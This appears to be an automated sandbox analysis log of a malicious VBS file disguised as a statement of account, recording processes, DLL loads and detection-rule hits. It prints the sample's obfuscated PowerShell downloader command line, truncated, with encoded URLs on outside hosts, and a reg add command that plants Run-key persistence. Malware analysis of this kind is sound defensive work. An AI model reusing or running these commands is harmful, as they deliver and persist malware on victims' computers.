              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52B60 NtClose,8_2_1FD52B60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52AD0 NtReadFile,8_2_1FD52AD0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52AF0 NtWriteFile,8_2_1FD52AF0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD52AB0 NtWaitForSingleObject,8_2_1FD52AB0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD539B0 NtGetContextThread,8_2_1FD539B0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD54650 NtSuspendThread,8_2_1FD54650
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BABAB8A1_2_00007FFD9BABAB8A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BABB93A1_2_00007FFD9BABB93A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04ABE9283_2_04ABE928
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04ABF1F83_2_04ABF1F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04ABE5E03_2_04ABE5E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0778D3703_2_0778D370
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD12FC88_2_1FD12FC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD21F928_2_1FD21F92
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDDFFB18_2_1FDDFFB1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD94F408_2_1FD94F40
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDDFF098_2_1FDDFF09
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD40F308_2_1FD40F30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD62F288_2_1FD62F28
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDDEEDB8_2_1FDDEEDB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD32E908_2_1FD32E90
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDDCE938_2_1FDDCE93
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD29EB08_2_1FD29EB0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD20E598_2_1FD20E59
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDDEE268_2_1FDDEE26
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD3FDC08_2_1FD3FDC0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1ADE08_2_1FD1ADE0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD38DBF8_2_1FD38DBF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDD1D5A8_2_1FDD1D5A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD23D408_2_1FD23D40
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDD7D738_2_1FDD7D73
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD2AD008_2_1FD2AD00
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD10CF28_2_1FD10CF2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDDFCF28_2_1FDDFCF2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDC0CB58_2_1FDC0CB5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD20C008_2_1FD20C00
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD99C328_2_1FD99C32
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDD6BD78_2_1FDD6BD7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD5DBF98_2_1FD5DBF9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD3FB808_2_1FD3FB80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDDAB408_2_1FDDAB40
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDDFB768_2_1FDDFB76
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDCDAC68_2_1FDCDAC6
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1EA808_2_1FD1EA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD65AA08_2_1FD65AA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDBDAAC8_2_1FDBDAAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDDFA498_2_1FDDFA49
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDD7A468_2_1FDD7A46
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD93A6C8_2_1FD93A6C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD229A08_2_1FD229A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDEA9A68_2_1FDEA9A6
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD299508_2_1FD29950
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD3B9508_2_1FD3B950
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD369628_2_1FD36962
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD4E8F08_2_1FD4E8F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD238E08_2_1FD238E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD068B88_2_1FD068B8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD228408_2_1FD22840
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD2A8408_2_1FD2A840
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD1C7C08_2_1FD1C7C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDDF7B08_2_1FDDF7B0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD447508_2_1FD44750
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD207708_2_1FD20770
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FDD16CC8_2_1FDD16CC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD3C6E08_2_1FD3C6E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 1FD67E54 appears 61 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 1FD8EA12 appears 39 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 1FD0B970 appears 142 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 1FD9F290 appears 80 times
              Source: Statement_of_account.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)"
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7141
              Source: unknownProcess created: Commandline size = 7141
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7141Jump to behavior
              Source: amsi32_3488.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6776, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3488, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@13/8@2/1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Fakers.SpoJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6800:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2316:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_plleygx2.akf.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Statement_of_account.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6776
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3488
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Statement_of_account.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Collybia Journalisation Utugtsforhold Muttonbird motoriserende #><#Alkyder Ekstinktion Frdigpakkende Institutionalise Ombrometer Ttl Arketype #>$Penthiophen='Uninterviewed';function Manned($Presubmitting){If ($host.DebuggerEnabled) {$Rep=5} for ($Energibehov=$Rep;;$Energibehov+=6){if(!$Presubmitting[$Energibehov]) { break }$Verdour+=$Presubmitting[$Energibehov]}$Verdour}function svaj($Angloamerikanske){ .($Spredningseffekter) ($Angloamerikanske)}$Dichlorvos45=Manned 'Pa klNN.naceMisrotarene.PrereWCh laeMuscabWrestcambasl SamlI SaneESprjtNPickwT';$Officershlene=Manned ' GranM.ffenoVoro zSu ariKompalhespelSkarpaKasse/';$Kanaljens=Manned 'VrfteTFlyoflBeatssRepol1Perve2';$Abjectnesses='Unrea[Sacc.NDeliresubprTSchoo. agtssHudsoESta frBrugevimporIEnscoCProagePectipEmpieoOutfoI BegnnUroceTBo aiM Adi ALutrenAfnataUnlusGIn uiETopvirBe ri]Minut:Bully:Lamensjord EDaivacScia uBusbaRVapori lyntmilliY NarkP TilrRVindeOPro,rTMicroOMell cisocloElectLDomor=Flle,$ lod KWipinAFagg NStadsABrillL Par jHaidueDistrnLatinS';$Officershlene+=Manned ' ega5Jocum.Slamb0Rnner Folk(ShrewWScaveiAfluknGunnidBe jeoO nubwPl ntsCatec LovmeNOrlo,TSteni Unexi1 cadd0 Belg.Disen0 ilba;L gtu KvartWyac tiFodbonA ino6Dy,sv4Filac;Tipon SmashxDissa6styre4Fr tr; U de Purpur KbehvLygae:Fl es1Re er3 ence1Falte.Gas,r0Svamp)xer d raadGSib seReob cEup okkeithoUnsur/Apost2 ipv0Klubc1Manag0Bavar0citro1Sekre0pena 1 alli procaFCytobiSpiserUndeseKo muf V,tiocontixRagee/F ann1Nonte3Corms1Bew,l. Kalv0';$Myoalbumose=Manned ',lipsUDelirSLa dseIndelRSingu- amebATidewgIhuk.eagoninmirint';$Enarration=Manned 'Clockh Litot SkrutStormpArkitsTippe: Tare/Bi,li/Interh UncoeHaor.aRestrv Do eyPaleoe WagoqCrys.uHpsteiAlt ipU aarm S,eeeFilten N njtCorkes KredaRattll Mephe Rhi sShala.CozedaGableuEthic/ lycaSensod F ulmGr,teiElektn Orga/MusicVLerpfeDj elrM ndidPrepoePro rnMoralsS licaManagl DesitEx os.Agg,oaOutfis RealiNavel>J.ribhSerbetNonr,tUn lop Sjlss In.r: F.br/dori./bedliqLig.tp Pugh.FdsellTysseq Twaza relae MellbIs gnoKorve2Foret. EthnrGraziuTovtr.Grun.cVrdi oUbanemrelax/Forewa ProcdregnsmLa ysikroejnAbjur/PandeVForlae .iderOphredRenkueGra nn SinnsZemayaSubjulParaltT.rmi.Epigea E.onsUnciri';$Alerion194=Manned 'Brand>';$Spredningseffekter=Manned 'ShiftITwi tEPolysX';$Dioxinbegrnsning='Esthesiogen';$Oprykningerne3='\Fakers.Spo';svaj (Manned ' Resh$ AkupgUn,seLAntigOUnc.hBLy kraDeprel Li a:RekreEAfluskCyaneSTuathT outvR ElwiATwofeKHovedTUnven=resel$indfle OutfNElodevSouag: HedeaStrucpHyp rpGraendOpvura R sstVide ADel.b+Etrus$Opst.ONon oPobserRBegroyStatsKRegauN BrugIHomofnEftergFragmeStudirTouchnSustaeFrede3');svaj (Manned 'Vasoc$Congeg,caralRespeoKo sfB SpeeA EgomL Fr t:Rep sKAngellMirdaBA.istEinhabsKnaphtMoseyRCoraliFuldgmRe umLavneseVanddnMarty1Frogf1Astou5Beska= Krat$RyalaeUdsagnkontrAK oenrEnamiRAfterAKe,atTPty.lIRodenoTita n Ildk.blazosOstrepDobbel ransIUdskatScabb(Retal$pompoaZonullSp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Collybia Journalisation Utugtsforhold Muttonbird motoriserende #><#Alkyder Ekstinktion Frdigpakkende Institutionalise Ombrometer Ttl Arketype #>$Penthiophen='Uninterviewed';function Manned($Presubmitting){If ($host.DebuggerEnabled) {$Rep=5} for ($Energibehov=$Rep;;$Energibehov+=6){if(!$Presubmitting[$Energibehov]) { break }$Verdour+=$Presubmitting[$Energibehov]}$Verdour}function svaj($Angloamerikanske){ .($Spredningseffekter) ($Angloamerikanske)}$Dichlorvos45=Manned 'Pa klNN.naceMisrotarene.PrereWCh laeMuscabWrestcambasl SamlI SaneESprjtNPickwT';$Officershlene=Manned ' GranM.ffenoVoro zSu ariKompalhespelSkarpaKasse/';$Kanaljens=Manned 'VrfteTFlyoflBeatssRepol1Perve2';$Abjectnesses='Unrea[Sacc.NDeliresubprTSchoo. agtssHudsoESta frBrugevimporIEnscoCProagePectipEmpieoOutfoI BegnnUroceTBo aiM Adi ALutrenAfnataUnlusGIn uiETopvirBe ri]Minut:Bully:Lamensjord EDaivacScia uBusbaRVapori lyntmilliY NarkP TilrRVindeOPro,rTMicroOMell cisocloElectLDomor=Flle,$ lod KWipinAFagg NStadsABrillL Par jHaidueDistrnLatinS';$Officershlene+=Manned ' ega5Jocum.Slamb0Rnner Folk(ShrewWScaveiAfluknGunnidBe jeoO nubwPl ntsCatec LovmeNOrlo,TSteni Unexi1 cadd0 Belg.Disen0 ilba;L gtu KvartWyac tiFodbonA ino6Dy,sv4Filac;Tipon SmashxDissa6styre4Fr tr; U de Purpur KbehvLygae:Fl es1Re er3 ence1Falte.Gas,r0Svamp)xer d raadGSib seReob cEup okkeithoUnsur/Apost2 ipv0Klubc1Manag0Bavar0citro1Sekre0pena 1 alli procaFCytobiSpiserUndeseKo muf V,tiocontixRagee/F ann1Nonte3Corms1Bew,l. Kalv0';$Myoalbumose=Manned ',lipsUDelirSLa dseIndelRSingu- amebATidewgIhuk.eagoninmirint';$Enarration=Manned 'Clockh Litot SkrutStormpArkitsTippe: Tare/Bi,li/Interh UncoeHaor.aRestrv Do eyPaleoe WagoqCrys.uHpsteiAlt ipU aarm S,eeeFilten N njtCorkes KredaRattll Mephe Rhi sShala.CozedaGableuEthic/ lycaSensod F ulmGr,teiElektn Orga/MusicVLerpfeDj elrM ndidPrepoePro rnMoralsS licaManagl DesitEx os.Agg,oaOutfis RealiNavel>J.ribhSerbetNonr,tUn lop Sjlss In.r: F.br/dori./bedliqLig.tp Pugh.FdsellTysseq Twaza relae MellbIs gnoKorve2Foret. EthnrGraziuTovtr.Grun.cVrdi oUbanemrelax/Forewa ProcdregnsmLa ysikroejnAbjur/PandeVForlae .iderOphredRenkueGra nn SinnsZemayaSubjulParaltT.rmi.Epigea E.onsUnciri';$Alerion194=Manned 'Brand>';$Spredningseffekter=Manned 'ShiftITwi tEPolysX';$Dioxinbegrnsning='Esthesiogen';$Oprykningerne3='\Fakers.Spo';svaj (Manned ' Resh$ AkupgUn,seLAntigOUnc.hBLy kraDeprel Li a:RekreEAfluskCyaneSTuathT outvR ElwiATwofeKHovedTUnven=resel$indfle OutfNElodevSouag: HedeaStrucpHyp rpGraendOpvura R sstVide ADel.b+Etrus$Opst.ONon oPobserRBegroyStatsKRegauN BrugIHomofnEftergFragmeStudirTouchnSustaeFrede3');svaj (Manned 'Vasoc$Congeg,caralRespeoKo sfB SpeeA EgomL Fr t:Rep sKAngellMirdaBA.istEinhabsKnaphtMoseyRCoraliFuldgmRe umLavneseVanddnMarty1Frogf1Astou5Beska= Krat$RyalaeUdsagnkontrAK oenrEnamiRAfterAKe,atTPty.lIRodenoTita n Ildk.blazosOstrepDobbel ransIUdskatScabb(Retal$pompoaZonullSp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Collybia Journalisation Utugtsforhold Muttonbird motoriserende #><#Alkyder Ekstinktion Frdigpakkende Institutionalise Ombrometer Ttl Arketype #>$Penthiophen='Uninterviewed';function Manned($Presubmitting){If ($host.DebuggerEnabled) {$Rep=5} for ($Energibehov=$Rep;;$Energibehov+=6){if(!$Presubmitting[$Energibehov]) { break }$Verdour+=$Presubmitting[$Energibehov]}$Verdour}function svaj($Angloamerikanske){ .($Spredningseffekter) ($Angloamerikanske)}$Dichlorvos45=Manned 'Pa klNN.naceMisrotarene.PrereWCh laeMuscabWrestcambasl SamlI SaneESprjtNPickwT';$Officershlene=Manned ' GranM.ffenoVoro zSu ariKompalhespelSkarpaKasse/';$Kanaljens=Manned 'VrfteTFlyoflBeatssRepol1Perve2';$Abjectnesses='Unrea[Sacc.NDeliresubprTSchoo. agtssHudsoESta frBrugevimporIEnscoCProagePectipEmpieoOutfoI BegnnUroceTBo aiM Adi ALutrenAfnataUnlusGIn uiETopvirBe ri]Minut:Bully:Lamensjord EDaivacScia uBusbaRVapori lyntmilliY NarkP TilrRVindeOPro,rTMicroOMell cisocloElectLDomor=Flle,$ lod KWipinAFagg NStadsABrillL Par jHaidueDistrnLatinS';$Officershlene+=Manned ' ega5Jocum.Slamb0Rnner Folk(ShrewWScaveiAfluknGunnidBe jeoO nubwPl ntsCatec LovmeNOrlo,TSteni Unexi1 cadd0 Belg.Disen0 ilba;L gtu KvartWyac tiFodbonA ino6Dy,sv4Filac;Tipon SmashxDissa6styre4Fr tr; U de Purpur KbehvLygae:Fl es1Re er3 ence1Falte.Gas,r0Svamp)xer d raadGSib seReob cEup okkeithoUnsur/Apost2 ipv0Klubc1Manag0Bavar0citro1Sekre0pena 1 alli procaFCytobiSpiserUndeseKo muf V,tiocontixRagee/F ann1Nonte3Corms1Bew,l. Kalv0';$Myoalbumose=Manned ',lipsUDelirSLa dseIndelRSingu- amebATidewgIhuk.eagoninmirint';$Enarration=Manned 'Clockh Litot SkrutStormpArkitsTippe: Tare/Bi,li/Interh UncoeHaor.aRestrv Do eyPaleoe WagoqCrys.uHpsteiAlt ipU aarm S,eeeFilten N njtCorkes KredaRattll Mephe Rhi sShala.CozedaGableuEthic/ lycaSensod F ulmGr,teiElektn Orga/MusicVLerpfeDj elrM ndidPrepoePro rnMoralsS licaManagl DesitEx os.Agg,oaOutfis RealiNavel>J.ribhSerbetNonr,tUn lop Sjlss In.r: F.br/dori./bedliqLig.tp Pugh.FdsellTysseq Twaza relae MellbIs gnoKorve2Foret. EthnrGraziuTovtr.Grun.cVrdi oUbanemrelax/Forewa ProcdregnsmLa ysikroejnAbjur/PandeVForlae .iderOphredRenkueGra nn SinnsZemayaSubjulParaltT.rmi.Epigea E.onsUnciri';$Alerion194=Manned 'Brand>';$Spredningseffekter=Manned 'ShiftITwi tEPolysX';$Dioxinbegrnsning='Esthesiogen';$Oprykningerne3='\Fakers.Spo';svaj (Manned ' Resh$ AkupgUn,seLAntigOUnc.hBLy kraDeprel Li a:RekreEAfluskCyaneSTuathT outvR ElwiATwofeKHovedTUnven=resel$indfle OutfNElodevSouag: HedeaStrucpHyp rpGraendOpvura R sstVide ADel.b+Etrus$Opst.ONon oPobserRBegroyStatsKRegauN BrugIHomofnEftergFragmeStudirTouchnSustaeFrede3');svaj (Manned 'Vasoc$Congeg,caralRespeoKo sfB SpeeA EgomL Fr t:Rep sKAngellMirdaBA.istEinhabsKnaphtMoseyRCoraliFuldgmRe umLavneseVanddnMarty1Frogf1Astou5Beska= Krat$RyalaeUdsagnkontrAK oenrEnamiRAfterAKe,atTPty.lIRodenoTita n Ildk.blazosOstrepDobbel ransIUdskatScabb(Retal$pompoaZonullSpJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
